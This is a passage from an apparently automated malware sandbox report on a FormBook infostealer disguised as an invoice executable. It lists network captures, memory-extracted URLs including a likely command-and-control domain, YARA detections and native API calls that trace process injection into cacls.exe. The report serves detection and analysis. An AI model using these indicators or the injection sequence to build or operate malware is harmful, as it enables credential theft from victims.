22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 Dec 2024 12:58:42 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 14 Dec 2024 12:59:12 GMTContent-Type: text/html; charset=utf-8Content-Length: 58296Connection: closeVary: Accept-EncodingETag: "675bd032-e3b8"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 14 Dec 2024 12:59:15 GMTContent-Type: text/html; charset=utf-8Content-Length: 58296Connection: closeVary: Accept-EncodingETag: "675bd032-e3b8"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sat, 14 Dec 2024 12:59:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 58296Connection: closeVary: Accept-EncodingETag: "675bd032-e3b8"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: profroma invoice.exeString found in binary or memory: http://tempuri.org/kviskotekaDbDataSet.xsdcIgra
                Source: vEErKBMCpBGs.exe, 00000008.00000002.3924593962.0000000000A55000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.1qcczjvh2.autos
                Source: vEErKBMCpBGs.exe, 00000008.00000002.3924593962.0000000000A55000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.1qcczjvh2.autos/pfw9/
                Source: cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cacls.exe, 00000007.00000002.3926041344.000000000401A000.00000004.10000000.00040000.00000000.sdmp, vEErKBMCpBGs.exe, 00000008.00000002.3925480533.00000000031BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: cacls.exe, 00000007.00000002.3926041344.000000000401A000.00000004.10000000.00040000.00000000.sdmp, vEErKBMCpBGs.exe, 00000008.00000002.3925480533.00000000031BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cacls.exe, 00000007.00000002.3924027497.0000000002C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: cacls.exe, 00000007.00000002.3924027497.0000000002C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: cacls.exe, 00000007.00000002.3924027497.0000000002C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: cacls.exe, 00000007.00000002.3924027497.0000000002C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Q
                Source: cacls.exe, 00000007.00000002.3924027497.0000000002C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: cacls.exe, 00000007.00000002.3924027497.0000000002C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: cacls.exe, 00000007.00000003.2999021069.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: cacls.exe, 00000007.00000002.3926041344.000000000433E000.00000004.10000000.00040000.00000000.sdmp, vEErKBMCpBGs.exe, 00000008.00000002.3925480533.00000000034DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
                Source: cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: cacls.exe, 00000007.00000002.3927803075.0000000007D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.profroma invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.profroma invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3924593962.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3924982595.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2811552200.0000000001B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3925053605.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2807926965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2808844558.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3925224041.0000000002640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: profroma invoice.exe
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0042CE23 NtClose,4_2_0042CE23
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762B60 NtClose,LdrInitializeThunk,4_2_01762B60
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01762DF0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01762C70
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017635C0 NtCreateMutant,LdrInitializeThunk,4_2_017635C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01764340 NtSetContextThread,4_2_01764340
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01764650 NtSuspendThread,4_2_01764650
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762BF0 NtAllocateVirtualMemory,4_2_01762BF0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762BE0 NtQueryValueKey,4_2_01762BE0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762BA0 NtEnumerateValueKey,4_2_01762BA0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762B80 NtQueryInformationFile,4_2_01762B80
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762AF0 NtWriteFile,4_2_01762AF0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762AD0 NtReadFile,4_2_01762AD0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762AB0 NtWaitForSingleObject,4_2_01762AB0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762D30 NtUnmapViewOfSection,4_2_01762D30
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762D10 NtMapViewOfSection,4_2_01762D10
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762D00 NtSetInformationFile,4_2_01762D00
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762DD0 NtDelayExecution,4_2_01762DD0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762DB0 NtEnumerateKey,4_2_01762DB0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762C60 NtCreateKey,4_2_01762C60
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762C00 NtQueryInformationProcess,4_2_01762C00
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762CF0 NtOpenProcess,4_2_01762CF0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762CC0 NtQueryVirtualMemory,4_2_01762CC0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762CA0 NtQueryInformationToken,4_2_01762CA0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762F60 NtCreateProcessEx,4_2_01762F60
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762F30 NtCreateSection,4_2_01762F30
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762FE0 NtCreateFile,4_2_01762FE0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762FB0 NtResumeThread,4_2_01762FB0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762FA0 NtQuerySection,4_2_01762FA0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762F90 NtProtectVirtualMemory,4_2_01762F90
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762E30 NtWriteVirtualMemory,4_2_01762E30
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762EE0 NtQueueApcThread,4_2_01762EE0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762EA0 NtAdjustPrivilegesToken,4_2_01762EA0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762E80 NtReadVirtualMemory,4_2_01762E80
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01763010 NtOpenDirectoryObject,4_2_01763010
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01763090 NtSetValueKey,4_2_01763090
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017639B0 NtGetContextThread,4_2_017639B0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01763D70 NtOpenThread,4_2_01763D70
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01763D10 NtOpenProcessToken,4_2_01763D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C4340 NtSetContextThread,LdrInitializeThunk,7_2_031C4340
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C4650 NtSuspendThread,LdrInitializeThunk,7_2_031C4650
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2B60 NtClose,LdrInitializeThunk,7_2_031C2B60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_031C2BA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_031C2BF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_031C2BE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2AD0 NtReadFile,LdrInitializeThunk,7_2_031C2AD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2AF0 NtWriteFile,LdrInitializeThunk,7_2_031C2AF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2F30 NtCreateSection,LdrInitializeThunk,7_2_031C2F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2FB0 NtResumeThread,LdrInitializeThunk,7_2_031C2FB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2FE0 NtCreateFile,LdrInitializeThunk,7_2_031C2FE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_031C2E80
